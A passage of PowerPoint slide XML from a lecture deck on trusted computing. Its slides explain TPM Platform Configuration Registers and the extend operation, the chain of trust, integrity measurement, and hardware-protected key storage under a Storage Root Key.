        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16417" name="Line 51"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3276600" y="2965608"/>
            <a:ext cx="1752600" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="00FF00"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16418" name="Line 52"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096000" y="4978558"/>
            <a:ext cx="685800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="00FF00"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16419" name="Text Box 53"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7010400" y="4794408"/>
            <a:ext cx="1752600" cy="336550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>storing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>PCR values</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16420" name="Line 54"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1295400" y="1670208"/>
            <a:ext cx="3124200" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16421" name="Line 55"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2667000" y="1746408"/>
            <a:ext cx="1905000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16422" name="Line 56"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4191000" y="1746408"/>
            <a:ext cx="533400" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16423" name="Line 57"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5029200" y="1746408"/>
            <a:ext cx="152400" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16424" name="Line 58"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6096000" y="5327808"/>
            <a:ext cx="685800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16425" name="Text Box 60"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7010400" y="5143658"/>
            <a:ext cx="1981200" cy="336550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>logging methods</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="矩形 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="197708" y="5355545"/>
            <a:ext cx="8044249" cy="1588127"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Each layer of the platform is checked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Hardware attests what OS is booted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>OS attests what application it requires a key for and will only allow the use of that key by that given application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Builds a “Chain of Trust”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dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Extend the PCR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17411" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="3276600"/>
            <a:ext cx="8001000" cy="3124200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Platform Configuration Register (PCR)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Extend(PCR; value) = SHA1(PCR || value)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17412" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="1905000"/>
            <a:ext cx="3962400" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Platform Configuration Register</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17413" name="Oval 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="2590800"/>
            <a:ext cx="838200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Hash</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17414" name="Oval 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3886200" y="2590800"/>
            <a:ext cx="1752600" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Concatenate</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17415" name="Line 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3276600" y="2819400"/>
            <a:ext cx="609600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17416" name="Line 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2895600" y="2209800"/>
            <a:ext cx="0" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17417" name="Line 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724400" y="2209800"/>
            <a:ext cx="0" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17418" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5638800" y="2819400"/>
            <a:ext cx="1371600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17419" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1295400" y="1733746"/>
            <a:ext cx="5334000" cy="1447800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:alpha val="5098"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17420" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="2286000"/>
            <a:ext cx="1600200" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>extended value</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17421" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724400" y="2286000"/>
            <a:ext cx="1600200" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>present value</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17422" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6629400" y="2419546"/>
            <a:ext cx="1752600" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>measured values</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17423" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1295400" y="2833688"/>
            <a:ext cx="838200" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>TPM</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Integrity Measurement</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="58370" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="755333" y="1208672"/>
            <a:ext cx="7267575" cy="4248150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="317634" y="5380672"/>
            <a:ext cx="9066998" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Measurement Agent measures at OS level all processes before</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Goal: Extraction of properties/characteristics that describe the trust</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>level of a platform</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="24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Hardware Protected Storage</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="230736" y="1350236"/>
            <a:ext cx="8665436" cy="2514754"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Examples of secret data that the user might want to protect include File Encryption keys, VPN keys, Authentication keys, etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Hardware encrypts the secret data; can only be decrypted by the dedicated piece of hardware, which contains the necessary private key.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>TPM implements a key hierarchy of all keys used for protected storage functions. The root of this hierarchy is the Storage Root Key (SRK). Each key in the hierarchy is encrypted using the key that is at the next level up in the hierarchy. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Encryption of secret data using the TPM results in a “Data Blob” and a “Key Blob”</a:t>
            </a:r>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12/19/2012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63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
